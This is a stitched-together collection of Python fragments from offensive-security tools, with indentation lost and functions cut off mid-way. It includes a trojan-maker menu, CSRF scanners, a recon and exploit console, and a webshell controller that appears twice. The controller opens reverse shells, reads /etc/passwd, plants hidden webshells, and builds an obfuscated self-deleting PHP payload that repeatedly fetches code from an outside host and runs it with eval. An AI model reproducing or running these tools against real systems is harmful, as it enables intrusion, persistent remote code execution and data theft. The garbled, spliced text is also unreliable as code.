def main():
banner()
help()
while True:
cmd = raw_input(str(Log.console("asist@AWD: ")).strip('None'))
if cmd == "make" or cmd == 'm':
make_trojan()
elif cmd == "h" or cmd == '?':
help()
elif cmd == 'exit' or cmd == 'e':
break
else:
print "help(?)"
def __init__(self):
self.main = main()
self.io = io()
self.tip = tip()
self.execute = execute()
self.loader = loader()
self.config = config()
self.badges = badges()
self.banner = banner()
self.storage = storage()
def __init__(self):
self.io = io()
self.tip = tip()
self.execute = execute()
self.loader = loader()
self.config = config()
self.badges = badges()
self.banner = banner()
self.storage = storage()
self.modules = modules()
self.exceptions = exceptions()
def __init__(self):
self.io = io()
self.tip = tip()
self.jobs = jobs()
self.execute = execute()
self.loader = loader()
self.config = config()
self.badges = badges()
self.banner = banner()
self.colors = colors()
self.local_storage = local_storage()
self.modules = modules()
self.exceptions = exceptions()
self.history = self.config.path_config['base_paths']['history_path']
def main():
# Clear up the terminal screen
subprocess.call("clear", shell=True)
print(banner())
print()
# Check the validity of user entered subreddit and assign its value to sub
sub = check_validity()
# Category menu
print("""%s[+] Wubba Lubba dub-dub!
Select a Category:
1) Top
2) New
3) Hot
4) Rising
5) Exit
""" % (green))
# Loop until valid category is selected
while (True):
ch = int(input("%sEnter your choice: %s" % (green, reset)))
print()
if ch == 1 or ch == 2 or ch == 3 or ch == 4 or ch == 5:
if ch == 5:
sys.exit()
else:
break
else:
print("%s[-] Invalid input detected please enter a valid input!" %
(red))
print()
# Call function to display image urls fetched for respective sub and category
fetch_choices(ch, sub)
from modules.morse import morse_decode
from modules.utf import utf_decode
from modules.nato import convert_nato
from modules.octal import decode_octal
from modules.netbios import decode_netbios
from modules.binary import decode_binary
from modules.reverse import reverse_string
from modules.decimal import decode_decimal
from modules.bacon import decode_bacon
from modules import cracker
except ModuleNotFoundError:
message("!", "Please Run 'install.sh'!")
exit(1)
banner(0.0005)
while True:
try:
CommandComplete()
cmd = input(red("crypted") + gray(" » "))
if cmd != "":
if cmd.split()[0] == "rainbow-crack":
message("+", "Coming soon...")
# RAINBOW TABLES
if cmd.split()[0] == "rainbow-init":
message("+", "Coming soon...")
"""
def main():
banner()
if len(sys.argv) != 4:
show_help()
exit(1)
url = sys.argv[1]
method = sys.argv[2]
password = sys.argv[3]
webshell = WebShell(url, method, password)
LOCAL_COMMAND_FLAG = True
if not webshell.working:
Log.error("The webshell cannot work...")
exit(2)
Log.info("recording this webshell to the log file...")
with open("Webshell.txt", "a+") as f:
log_content = "%s => %s => %s\n" % (url, method, password)
f.write(log_content)
main_help()
while True:
Log.context("sniper")
context_fresh = raw_input("=>") or "h"
context = string.lower(context_fresh)
if context == "h" or context == "help" or context == "?":
main_help()
elif context == "sh" or context == "shell":
shell = Shell(webshell)
shell.interactive()
elif context == "rsh" or context == "rshell":
Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
ip = raw_input("[IP] : (%s)" %
(get_ip_address())) or get_ip_address()
port = raw_input("[PORT] : (8888)") or "8888"
Log.info("Starting reverse shell (%s:%s)" % (ip, port))
webshell.reverse_shell(ip, port)
elif context == "p" or context == "print":
webshell.print_info()
elif context == "pv" or context == "php_version":
Log.success(webshell.get_php_version())
elif context == "kv" or context == "kernel_version":
Log.success(webshell.get_kernel_version())
elif context == "c" or context == "config":
Log.info("Detacting config files...")
webshell.get_config_file()
elif context == "fwd":
webshell.get_writable_directory()
elif context == "gdf":
webshell.get_disabled_functions()
elif context == "fwpf":
webshell.get_writable_php_file()
elif context == "fsb":
webshell.get_suid_binaries()
elif context == "setr":
LOCAL_COMMAND_FLAG = False
elif context == "setl":
LOCAL_COMMAND_FLAG = True
elif context == "dla":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
args = raw_input("Please custom find args (%s) : " %
(" -size 500k")) or " -size 500k"
Log.info("Using command : find %s %s" % (path, args))
webshell.download_advanced(path, args)
elif context == "dl":
path = raw_input(
"Input path (%s) : " % webshell.webroot) or (webshell.webroot)
if not webshell.file_exists(path):
Log.error("The file [%s] is not exists on the server!" %
(path))
continue
if webshell.is_directory(path):
Log.info(
"The target file is a directory, using recursion download..."
)
filename_filter = raw_input("Input --name '%s' : " %
("*.php")) or "*.php"
webshell.download_recursion(path, filename_filter)
else:
#filename = path.split("/")[-1]
#local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
# Log.info("Using root path : [%s] to save!" % (local_path))
Log.info(
"The target file is a single file, starting download...")
webshell.download(path, path)
elif context == "ps":
hosts = raw_input(
"Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
if not "/" in hosts:
Log.error(
"Please use the format IP/MASK , if want to scan a single host , set MASK=32"
)
continue
ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
) or "21,22,25,80,443,445,3389"
webshell.port_scan(hosts, ports)
elif context == "aiw":
default_filename = random_string(0x10, string.letters)
default_password = md5(
md5("%s%s%s" % (salt, default_filename, salt)))
filename = raw_input("Filename (.%s.php): " %
(default_filename)) or (".%s.php" %
(default_filename))
password = raw_input("Password (%s): " %
(default_password)) or ("%s" %
(default_password))
webshell.auto_inject_webshell(filename, password)
elif context == "aimw":
default_filename = random_string(0x10, string.letters)
default_password = md5(
md5("%s%s%s" % (salt, default_filename, salt)))
filename = raw_input("Filename (.%s.php): " %
(default_filename)) or (".%s.php" %
(default_filename))
password = raw_input("Password (%s): " %
(default_password)) or ("%s" %
(default_password))
webshell.auto_inject_memery_webshell(filename, password)
elif context == "fr":
Log.info("Starting flag reaper...")
webserver_host = raw_input("[IP] (%s) : " %
(get_ip_address())) or get_ip_address()
webserver_port = int(raw_input("[PORT] (80) : ") or "80")
filename = ".%s.php" % (random_string(0x10, string.letters))
file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
webserver_host, webserver_port)
Log.info("Temp memory phpfile : %s" % (file_content))
Log.info("Encoding phpfile...")
file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
file_content.encode("base64").replace("\n", ""))
Log.info("Final memory phpfile : %s" % (file_content))
result = webshell.auto_inject_flag_reaper(filename, file_content)
if result:
Log.success(
"Please check the web server(%s:%d) log to get your flag!"
% (webserver_host, webserver_port))
Log.info("Tips : tail -f /var/log/apache2/access.log")
else:
Log.error("Starting flag reaper failed!")
elif context == "r" or context == "read":
filepath = raw_input(
"Input file path (/etc/passwd) : ") or "/etc/passwd"
webshell.read_file(filepath)
elif context == "db" or context == "database":
ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
username = raw_input("Username (root): ") or "root"
password = raw_input("Password (root): ") or "root"
Log.info("Creating connection by [%s:%s] to [%s]..." %
(username, password, ip))
mysql_connection = Mysql(webshell, ip, username, password)
if not mysql_connection.function:
Log.error("The target server cannot support mysql!")
continue
if not mysql_connection.connection_flag:
Log.error("Connection failed!")
continue
Log.success("Connection success!")
if mysql_connection.function != "":
Log.success("Entering database server interactive mode...")
mysql_connection.interactive()
else:
Log.error("No supported database function!")
elif context == "q" or context == "quit" or context == "exit":
Log.info("Quiting...")
break
else:
Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.info("Executing command on localhost...")
os.system(context_fresh)
else:
Log.info("Executing command on target server...")
webshell.auto_exec_print(context_fresh)
yaml_name,cookies,HD,fRe,paths,Method,expression,datas,md5_path,md5 = parse.get_yaml("fingerprint/"+y)
if yaml_name.split("-")[-1] != "md5" and "/" in paths and Method == "get" and fRe == False:
if eval(expression):
print(" "+yaml_name + ": "+url)
wFile(yaml_name + ": "+url)
if type_F == "first":
fileL.remove(url)
if type_F == "second" and sec_flag == False:
sec_flag = True
return
if __name__ == '__main__':
os.system('')
banner.banner()
if len(sys.argv) != 4:
print('\n')
print("Usage: python3 Frog-Fp.py win/linux -tL urls.txt")
print("Usage: python3 Frog-Fp.py win/linux -dL ips.txt")
exit()
else:
parser = argparse.ArgumentParser()
parser.add_argument('os', help='win/linux')
parser.add_argument('-tL', help='urls', default='')
parser.add_argument('-dL', help='domains', default='')
args = parser.parse_args()
#根据系统设置二进制文件名
getsys(args.os)
def handle_options(options: dict):
if options["version"]:
exit(banner.banner())
data = {
'qbase64': base64.b64encode(query_str),
'email': self.email,
'key': self.key,
'size': size,
'fields': fields
}
req = requests.get(url, params=data, timeout=10)
return req.json()
except requests.exceptions.ConnectionError:
error_msg = {"error": True, "errmsg": "Connect error"}
return error_msg
if __name__ == '__main__':
banner()
ips = []
fofa = FofaAPI(email, key)
try:
result = fofa.get_data(cmd.get("query"), cmd.get("size"),
"host,ip,title")
except:
logger.INFO("search error!!")
for host, ip, title in result['results']:
if cmd.get("cidr"):
ips.append(ip2cidr(ip))
logger.INFO("Host: {0} IP: {1} Title: [{2}]".format(host, ip, title) +
" is FOUND!")
num = num + 1
if cmd.get("cidr"):
def main():
while True:
try:
PTF = raw_input("Pentest>> ")
if PTF == 'use modules/exploits':
core.menu.exploits()
main()
elif PTF == 'use modules/scanners':
core.menu.scan()
main()
elif PTF =='use modules/password':
core.menu.pas1()
main()
elif PTF == 'use modules/post':
core.menu.post()
main()
elif PTF =='use modules/listener':
core.menu.listener()
main()
elif PTF =='use modules/exploitdb':
core.menu.exploit_db()
main()
elif PTF =='use modules/tools':
core.menu.tools()
main()
elif PTF =='shell':
core.exploit.commands()
main()
elif PTF == 'show modules':
core.help.modules()
main()
elif PTF =='ipconfig':
core.exploit.ip1()
main()
elif PTF =='show options':
core.help.help()
main()
elif PTF =='update':
core.exploit.update()
main()
elif PTF =='about':
core.banner.info()
main()
elif PTF =='credits':
core.banner.credits()
main()
elif PTF =='banner':
clean(),banner(),ptf(),main()
elif PTF =='clear':
core.menu.exploit.clean()
main()
elif PTF =='exit':
core.banner.exits()
exit()
else:
print "Wrong Command => ", PTF
print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
main()
except(KeyboardInterrupt):
print("\n"+R+"[*] (Ctrl + C ) Detected, Trying To Exit ...\n" )
time.sleep(2)
print(""+G+"[*] Thank You For Using Pentest Framework =)\n" )
time.sleep(3)
exit()
def Engine(): # lets begin it!
os.system('clear') # Clear shit from terminal :p
banner() # Print the banner
banabout() # The second banner
web, fld = inputin() # Take the input
form1 = testFormx1() # Get the form 1 ready
form2 = testFormx2() # Get the form 2 ready
# For the cookies that we encounter during requests...
Cookie0 = http.cookiejar.CookieJar() # First as User1
Cookie1 = http.cookiejar.CookieJar() # Then as User2
resp1 = build_opener(HTTPCookieProcessor(Cookie0)) # Process cookies
resp2 = build_opener(HTTPCookieProcessor(Cookie1)) # Process cookies
actionDone = [] # init to the done stuff
csrf = '' # no token initialise / invalid token
ref_detect = 0x00 # Null Char Flag
ori_detect = 0x00 # Null Char Flags
form = Debugger.Form_Debugger() # init to the form parser+token generator
bs1 = BeautifulSoup(form1).findAll(
'form', action=True)[0] # make sure the stuff works properly
bs2 = BeautifulSoup(form2).findAll('form', action=True)[0] # same as above
init1 = web # First init
resp1.open(init1) # Makes request as User2
resp2.open(init1) # Make request as User1
# Now there are 2 different modes of scanning and crawling here.
# 1st -> Testing a single endpoint without the --crawl flag.
# 2nd -> Testing all endpoints with the --crawl flag.
try:
# Implementing the first mode. [NO CRAWL]
if not CRAWL_SITE:
url = web
response = Get(url).text
try:
verbout(O, 'Trying to parse response...')
soup = BeautifulSoup(response) # Parser init
except HTMLParser.HTMLParseError:
verbout(R, 'BeautifulSoup Error: ' + url)
i = 0 # Init user number
if REFERER_ORIGIN_CHECKS:
# Referer Based Checks if True...
verbout(
O, 'Checking endpoint request validation via ' +
color.GREY + 'Referer' + color.END + ' Checks...')
if Referer(url):
ref_detect = 0x01
verbout(O, 'Confirming the vulnerability...')
# We have finished with Referer Based Checks, lets go for Origin Based Ones...
verbout(
O, 'Confirming endpoint request validation via ' +
color.GREY + 'Origin' + color.END + ' Checks...')
if Origin(url):
ori_detect = 0x01
# Now lets get the forms...
verbout(
O, 'Retrieving all forms on ' + color.GREY + url + color.END +
'...')
for m in Debugger.getAllForms(
soup): # iterating over all forms extracted
verbout(O, 'Testing form:\n' + color.CYAN)
formPrettify(m.prettify())
verbout('', '')
FORMS_TESTED.append('(i) ' + url + ':\n\n' + m.prettify() +
'\n')
try:
if m['action']:
pass
except KeyError:
m['action'] = '/' + url.rsplit('/', 1)[1]
ErrorLogger(url, 'No standard form "action".')
action = Parser.buildAction(
url,
m['action']) # get all forms which have 'action' attribute
if not action in actionDone and action != '': # if url returned is not a null value nor duplicate...
# If form submission is kept to True
if FORM_SUBMISSION:
try:
# NOTE: Slow connections may cause read timeouts which may result in AttributeError
# So the idea here is tp make requests pretending to be 3 different users.
# Now a series of requests will be targeted against the site with different
# identities. Refer to XSRFProbe wiki for more info.
#
# NOTE: Slow connections may cause read timeouts which may result in AttributeError
result, genpoc = form.prepareFormInputs(
m) # prepare inputs as user 1
r1 = Post(
url, action, result
) # make request with token values generated as user1
result, genpoc = form.prepareFormInputs(
m) # prepare inputs as user 2
r2 = Post(
url, action, result
) # again make request with token values generated as user2
# Go for cookie based checks
if COOKIE_BASED:
Cookie(url, r1)
# Go for token based entropy checks...
try:
if m['name']:
query, token = Entropy(
result, url, r1.headers, m.prettify(),
m['action'], m['name'])
except KeyError:
query, token = Entropy(result, url, r1.headers,
m.prettify(),
m['action'])
# Now its time to detect the encoding type (if any) of the Anti-CSRF token.
fnd, detct = Encoding(token)
if fnd == 0x01 and detct:
VulnLogger(
url,
'Token is a string encoded value which can be probably decrypted.',
'[i] Encoding: ' + detct)
else:
NovulLogger(
url,
'Anti-CSRF token is not a string encoded value.'
)
# Go for token parameter tamper checks.
if (query and token):
txor = Tamper(url, action, result, r2.text,
query, token)
o2 = resp2.open(
url).read() # make request as user2
try:
form2 = Debugger.getAllForms(BeautifulSoup(
o2))[i] # user2 gets his form
except IndexError:
verbout(R, 'Form Index Error')
ErrorLogger(url, 'Form Index Error.')
continue # Making sure program won't end here (dirty fix :( )
verbout(GR, 'Preparing form inputs...')
contents2, genpoc = form.prepareFormInputs(
form2) # prepare for form 3 as user3
r3 = Post(
url, action, contents2
) # make request as user3 with user3's form
if (POST_BASED) and ((not query) or (txor)):
try:
if m['name']:
PostBased(url, r1.text, r2.text,
r3.text,
m['action'], result, genpoc,
m.prettify(), m['name'])
except KeyError:
PostBased(url, r1.text, r2.text, r3.text,
m['action'], result, genpoc,
m.prettify())
else:
print(
color.GREEN +
' [+] The form was requested with a Anti-CSRF token.'
)
print(color.GREEN + ' [+] Endpoint ' +
color.BG + ' NOT VULNERABLE ' +
color.END + color.GREEN +
' to POST-Based CSRF Attacks!')
NovulLogger(
url,
'Not vulnerable to POST-Based CSRF Attacks.'
)
except HTTPError as msg: # if runtime exception...
verbout(R, 'Exception : ' +
msg.__str__()) # again exception :(
ErrorLogger(url, msg)
actionDone.append(action) # add the stuff done
i += 1 # Increase user iteration
else:
# Implementing the 2nd mode [CRAWLING AND SCANNING].
verbout(GR, "Initializing crawling and scanning...")
crawler = Crawler.Handler(init1,
resp1) # Init to the Crawler handler
while crawler.noinit(): # Until 0 urls left
url = next(crawler) # Go for next!
print(C + 'Testing :> ' + color.CYAN +
url) # Display what url its crawling
try:
soup = crawler.process(fld) # Start the parser
if not soup:
continue # Making sure not to end the program yet...
i = 0 # Set count = 0 (user number 0, which will be subsequently incremented)
if REFERER_ORIGIN_CHECKS:
# Referer Based Checks if True...
verbout(
O, 'Checking endpoint request validation via ' +
color.GREY + 'Referer' + color.END + ' Checks...')
if Referer(url):
ref_detect = 0x01
verbout(O, 'Confirming the vulnerability...')
# We have finished with Referer Based Checks, lets go for Origin Based Ones...
verbout(
O, 'Confirming endpoint request validation via ' +
color.GREY + 'Origin' + color.END + ' Checks...')
if Origin(url):
ori_detect = 0x01
# Now lets get the forms...
verbout(
O, 'Retrieving all forms on ' + color.GREY + url +
color.END + '...')
for m in Debugger.getAllForms(
soup): # iterating over all forms extracted
FORMS_TESTED.append('(i) ' + url + ':\n\n' +
m.prettify() + '\n')
try:
if m['action']:
pass
except KeyError:
m['action'] = '/' + url.rsplit('/', 1)[1]
ErrorLogger(url, 'No standard "action" attribute.')
action = Parser.buildAction(
url, m['action']
) # get all forms which have 'action' attribute
if not action in actionDone and action != '': # if url returned is not a null value nor duplicate...
# If form submission is kept to True
if FORM_SUBMISSION:
try:
result, genpoc = form.prepareFormInputs(
m) # prepare inputs as user 1
r1 = Post(
url, action, result
) # make request with token values generated as user1
result, genpoc = form.prepareFormInputs(
m) # prepare inputs as user 2
r2 = Post(
url, action, result
) # again make request with token values generated as user2
if COOKIE_BASED:
Cookie(url, r1)
# Go for token based entropy checks...
try:
if m['name']:
query, token = Entropy(
result, url, r1.headers,
m.prettify(), m['action'],
m['name'])
except KeyError:
query, token = Entropy(
result, url, r1.headers,
m.prettify(), m['action'])
ErrorLogger(
url, 'No standard form "name".')
# Now its time to detect the encoding type (if any) of the Anti-CSRF token.
fnd, detct = Encoding(token)
if fnd == 0x01 and detct:
VulnLogger(
url,
'String encoded token value. Token might be decrypted.',
'[i] Encoding: ' + detct)
else:
NovulLogger(
url,
'Anti-CSRF token is not a string encoded value.'
)
# Go for token parameter tamper checks.
if (query and token):
txor = Tamper(url, action, result,
r2.text, query, token)
o2 = resp2.open(
url).read() # make request as user2
try:
form2 = Debugger.getAllForms(
BeautifulSoup(o2))[
i] # user2 gets his form
except IndexError:
verbout(R, 'Form Index Error')
ErrorLogger(url, 'Form Index Error.')
continue # making sure program won't end here (dirty fix :( )
verbout(GR, 'Preparing form inputs...')
contents2, genpoc = form.prepareFormInputs(
form2) # prepare for form 3 as user3
r3 = Post(
url, action, contents2
) # make request as user3 with user3's form
if (POST_BASED) and ((query == '') or
(txor == True)):
try:
if m['name']:
PostBased(
url, r1.text, r2.text,
r3.text, m['action'],
result, genpoc,
m.prettify(), m['name'])
except KeyError:
PostBased(url, r1.text, r2.text,
r3.text, m['action'],
result, genpoc,
m.prettify())
else:
print(
color.GREEN +
' [+] The form was requested with a Anti-CSRF token.'
)
print(color.GREEN + ' [+] Endpoint ' +
color.BG + ' NOT VULNERABLE ' +
color.END + color.GREEN +
' to P0ST-Based CSRF Attacks!')
NovulLogger(
url,
'Not vulnerable to POST-Based CSRF Attacks.'
)
except HTTPError as msg: # if runtime exception...
verbout(
color.RED,
' [-] Exception : ' + color.END +
msg.__str__()) # again exception :(
ErrorLogger(url, msg)
actionDone.append(action) # add the stuff done
i += 1 # Increase user iteration
except URLError as e: # if again...
verbout(R, 'Exception at : ' + url) # again exception -_-
time.sleep(0.4)
verbout(O, 'Moving on...')
ErrorLogger(url, e)
continue # make sure it doesn't stop at exceptions
# This error usually happens when some sites are protected by some load balancer
# example Cloudflare. These domains return a 403 forbidden response in various
# contexts. For example when making reverse DNS queries.
except HTTPError as e:
if str(e.code) == '403':
verbout(R, 'HTTP Authentication Error!')
verbout(R, 'Error Code : ' + O + str(e.code))
ErrorLogger(url, e)
quit()
GetLogger(
) # The scanning has finished, so now we can log out all the links ;)
print('\n' + G + "Scan completed!" + '\n')
Analysis() # For Post Scan Analysis
except KeyboardInterrupt as e: # Incase user wants to exit :') (while crawling)
verbout(R, 'User Interrupt!')
time.sleep(1.5)
Analysis() # For Post scan Analysis
print(R + 'Aborted!') # say goodbye
ErrorLogger('KeyBoard Interrupt', 'Aborted')
GetLogger(
) # The scanning has interrupted, so now we can log out all the links ;)
quit()
def main():
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
banner()
LOCAL_COMMAND_FLAG = True
CONTEXT = reset_context()
while True:
command = (raw_input("[%s]=> " % (color.red(CONTEXT))) or "help")
if command == "h" or command == "help" or command == "?":
main_help()
elif command == "version":
Log.info("Version: 0.0.1")
elif command == "show":
print "%s" % (color.purple("------\t\t------"))
print "%s" % (color.purple("Vendor\t\tModule"))
print "%s" % (color.purple("------\t\t------"))
exploit_path = "./exploit/"
vendors = os.listdir(exploit_path)
for vendor in vendors:
full_path = exploit_path + vendor
if os.path.isdir(full_path):
# Log.info("%s" % ("-" * 0x20))
# Log.info("Vendor: %s" % (vendor))
exploit_files = os.listdir(full_path)
number = 0
for exploit_file in exploit_files:
if exploit_file.endswith(
".py") and exploit_file != "__init__.py":
# Log.info("%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", "")))
if len(vendor) > 8:
print "%s" % (color.cyan(
"%s\t%s" %
(vendor, exploit_file.replace(".py", ""))))
else:
print "%s" % (color.cyan(
"%s\t\t%s" %
(vendor, exploit_file.replace(".py", ""))))
number += 1
# Log.info("%d exploits" % (number))
elif command.startswith("use "):
module_name = command.split(" ")[1]
Log.info("Loading module: %s" % (module_name))
try:
module = importlib.import_module(module_name)
except Exception as e:
Log.error(str(e))
continue
CONTEXT = module_name
exploit = module.Exploit()
exploit.show_info()
Log.info("%s" % ("-" * 0x40))
exploit.show_options()
while True:
module_command = (raw_input("[%s]=> " % (color.red(CONTEXT)))
or "help")
if module_command == "help":
main_help()
continue
if module_command.startswith("set "):
if len(module_command.split(" ")) == 3:
key = module_command.split(" ")[1]
value = module_command.split(" ")[2]
exploit.set_config(key, value)
else:
Log.error("Check your input!")
Log.info("Example: \n\tset [KEY] [VALUE]")
elif module_command == "options":
exploit.show_options()
elif module_command == "info":
exploit.show_info()
elif module_command == "exploit":
try:
exploit.exploit()
except Exception as e:
Log.error(str(e))
elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back":
break
else:
main_help()
CONTEXT = reset_context()
elif command == "q" or command == "quit" or command == "exit":
Log.info("Quiting...")
break
else:
Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.info("Executing command on localhost...")
os.system(command)
def Engine(): # lets begin it!
os.system('clear') # Clear shit from terminal :p
banner() # Print the banner
banabout() # The second banner
web = inputin() # Take the input
form1 = form10() # Get the form 1 ready
form2 = form20() # Get the form 2 ready
# For the cookies that we encounter during requests...
Cookie0 = http.cookiejar.CookieJar() # First as User1
Cookie1 = http.cookiejar.CookieJar() # Then as User2
resp1 = build_opener(HTTPCookieProcessor(Cookie0)) # Process cookies
resp2 = build_opener(HTTPCookieProcessor(Cookie1)) # Process cookies
actionDone = [] # init to the done stuff
csrf = '' # no token initialise / invalid token
ref_detect = 0x00 # Null Char
ori_detect = 0x00
init1 = web # get the starting page
form = Debugger.Form_Debugger() # init to the form parser+token generator
bs1 = BeautifulSoup(form1).findAll(
'form', action=True)[0] # make sure the stuff works properly
bs2 = BeautifulSoup(form2).findAll('form', action=True)[0] # same as above
action = init1 # First init
resp1.open(action) # Makes request as User2
resp2.open(action) # Make request as User1
verbout(GR, "Initializing crawling and scanning...")
crawler = Crawler.Handler(init1, resp1) # Init to the Crawler handler
try:
while crawler.noinit(): # Until 0 urls left
url = next(crawler) # Go for next!
print(C + 'Crawling :> ' + color.CYAN +
url) # Display what url its crawling
try:
soup = crawler.process(web) # Start the parser
if not soup:
continue # Making sure not to end the program yet...
i = 0 # Set count = 0
if REFERER_ORIGIN_CHECKS:
# Referer Based Checks if True...
verbout(
O, 'Checking endpoint request validation via ' +
color.GREY + 'Referer' + color.END + ' Checks...')
if Referer(url):
ref_detect = 0x01
verbout(O, 'Confirming the vulnerability...')
# We have finished with Referer Based Checks, lets go for Origin Based Ones...
verbout(
O, 'Confirming endpoint request validation via ' +
color.GREY + 'Origin' + color.END + ' Checks...')
if Origin(url):
ori_detect = 0x01
if COOKIE_BASED:
Cookie(url)
# Now lets get the forms...
verbout(
O, 'Retrieving all forms on ' + color.GREY + url +
color.END + '...')
for m in Debugger.getAllForms(
soup): # iterating over all forms extracted
action = Parser.buildAction(
url, m['action']
) # get all forms which have 'action' attribute
if not action in actionDone and action != '': # if url returned is not a null value nor duplicate...
# If form submission is kept to True
if FORM_SUBMISSION:
try:
result = form.prepareFormInputs(
m) # prepare inputs
r1 = Post(
url, action, result
).text # make request with token values generated as user1
result = form.prepareFormInputs(
m) # prepare the input types
r2 = Post(
url, action, result
).text # again make request with token values generated as user2
# Go for token based entropy checks...
try:
if m['name']:
query, token = Entropy(
result, url, m['action'],
m['name'])
except KeyError:
query, token = Entropy(
result, url, m['action'])
# Go for token parameter tamper checks.
if (query and token):
Tamper(url, action, result, r2, query,
token)
o2 = resp2.open(
url).read() # make request as user2
try:
form2 = Debugger.getAllForms(
BeautifulSoup(o2))[
i] # user2 gets his form
except IndexError:
verbout(R, 'Form Error')
continue # making sure program won't end here (dirty fix :( )
verbout(GR, 'Preparing form inputs...')
contents2 = form.prepareFormInputs(
form2) # prepare for form 2 as user2
r3 = Post(
url, action, contents2
).text # make request as user3 with user2's form
if POST_BASED:
try:
if m['name']:
PostBased(url, r1, r2, r3,
m['action'], result,
m['name'])
except KeyError:
PostBased(url, r1, r2, r3, m['action'],
result)
except HTTPError as msg: # if runtime exception...
verbout(R, 'Exception : ' +
msg.__str__()) # again exception :(
actionDone.append(action) # add the stuff done
i += 1 # Increase user iteration
except URLError: # if again...
verbout(R, 'Exception at : ' + url) # again exception -_-
time.sleep(0.4)
verbout(O, 'Moving on...')
continue # make sure it doesn't stop
print('\n' + G + "Scan completed!" + '\n')
Analysis() # For Post Scan Analysis
# This error usually happens when some sites are protected by some load balancer
# example Cloudflare. These domains return a 403 forbidden response in various
# contexts. For example when making reverse DNS queries.
except HTTPError as e:
if str(e.code) == '403':
verbout(R, 'HTTP Authentication Error!')
verbout(R, 'Error Code : ' + O + str(e.code))
quit()
except KeyboardInterrupt: # incase user wants to exit ;-; (while crawling)
verbout(R, 'User Interrupt!')
time.sleep(1.5)
Analysis() # For Post scan Analysis
print(R + 'Aborted!') # say goodbye
quit()
def debby_anggraini():
# banner and auto complete
banner()
complete(array)
# loop forever :v
while True:
try:
an = raw_input('Eazy_> ')
wibu = an.split()
# parse argument manual XD
arg = toxic(wibu, '-u,-t,-s,-n,-f')
# if an == '' or len(wibu) == 0:
if not wibu:
pass
# help menu
elif wibu[0] != '-h' and '-h' in wibu or wibu[
0] != '--help' and '--help' in wibu:
help_menu(wibu[0])
# advanced nmap commands
elif wibu[0] == 'nmap':
debby_lovlov(arg['-t'], arg['-u'])
# webkit modules
elif wibu[0] in webkit_dict:
# dirty hack XD
for i in webkit_dict:
if wibu[0] == i:
hackertarget(webkit_dict[i], arg['-u'])
elif wibu[0] == 'geoip':
geoip(arg['-u'])
elif wibu[0] == 'mxrecords':
mx(arg['-u'])
elif wibu[0] == 'domain_age':
domage(arg['-u'])
elif wibu[0] == 'whatcms':
cms(arg['-u'])
elif wibu[0] == 'subdomain':
subdo(arg['-u'])
elif wibu[0] == 'honeypot':
honey(arg['-u'])
elif wibu[0] == 'joom_sql_scan':
j_sql(arg['-u'])
elif wibu[0] == 'xss_scan':
xss(arg['-u'])
elif wibu[0] == 'rce_scan':
rcevuln(arg['-u'])
# exploit module
elif wibu[0] == 'wpscan':
wpscan(arg['-u'])
elif wibu[0] == 'user_pro':
check_vuln(arg['-u'])
elif wibu[0] == 'wp_user':
user_scan(arg['-u'], arg['-n'])
elif wibu[0] == 'wp_sym_exp':
exploit_wp(arg['-u'], arg['-f'])
elif wibu[0] == 'simple_slide_show_exp':
sss_ex(arg['-u'], arg['-f'])
elif wibu[0] == 'product_page_advert_exp':
ppa_ex(arg['-u'], arg['-f'])
elif wibu[0] == 'home_page_advert_exp':
hpa_ex(arg['-u'], arg['-f'])
# scanner module
elif wibu[0] == 'lfi_scan':
lfiscan(arg['-u'])
elif wibu[0] == 'hashbuster':
hash_scan()
elif wibu[0] == 'shell':
shell(arg['-u'])
elif wibu[0] == 'dirscan': # dir
dir(arg['-u'])
elif wibu[0] == 'dork' and wibu[1] != None:
msg = an.replace(wibu[0] + ' ',
'').replace('-s ', '').replace('-s', '')
if not msg:
usage('dork')
elif '-s' in an:
dorking(msg, 'scan')
else:
dorking(msg, )
# brute force module
elif wibu[0] == 'adfin':
adfin(arg['-u'])
elif wibu[0] == 'upload':
upload(arg['-u'])
# encryption modules
elif wibu[0] in encdec_array:
# bad coding :"
if '--enc' in wibu or '-e' in wibu:
ende(wibu[0], 'enc')
elif '--dec' in wibu or '-d' in wibu:
ende(wibu[0], 'dec')
else:
usage(wibu[0])
elif wibu[0] in hash_array:
hash(wibu[0], arg['-s'])
# others
elif wibu[0] == ':!':
if len(wibu) == 1:
printf('sh: commands not found', 2)
os.system(an[2:])
elif wibu[0] in ['q', 'quit']:
printf('[!] bye bye..')
break
elif an == 'show modules' or an == 'help':
show_modules()
elif an == 'show all modules' or an == 'help more':
show_modules('wibu bau bawang')
else:
printf('%s: not found.' % wibu[0], 2)
# end
# usage
except (IndexError, KeyError):
usage(wibu[0])
# user interrupt
except KeyboardInterrupt:
printf('\n\rError: Interrupt..')
# handle error
except (requests.exceptions.ConnectionError):
printf('Connection Error..', 2)
except Exception as e:
printf('%s' % str(e), 2)
def main():
banner()
if len(sys.argv) != 4:
show_help()
exit(1)
url = sys.argv[1]
method = sys.argv[2]
password = sys.argv[3]
webshell = WebShell(url, method, password)
LOCAL_COMMAND_FLAG = True
if not webshell.working:
Log.error("The webshell cannot work...")
exit(2)
main_help()
while True:
Log.context("sniper")
context_fresh = raw_input("=>") or "h"
context = string.lower(context_fresh)
if context == "h" or context == "help" or context == "?":
main_help()
elif context == "sh" or context == "shell":
shell = Shell(webshell)
shell.interactive()
elif context == "rsh" or context == "rshell":
Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
ip = raw_input("[IP] : (%s)" %
(get_ip_address())) or get_ip_address()
port = raw_input("[PORT] : (8888)") or "8888"
Log.info("Starting reverse shell (%s:%s)" % (ip, port))
webshell.reverse_shell(ip, port)
elif context == "p" or context == "print":
webshell.print_info()
elif context == "pv" or context == "php_version":
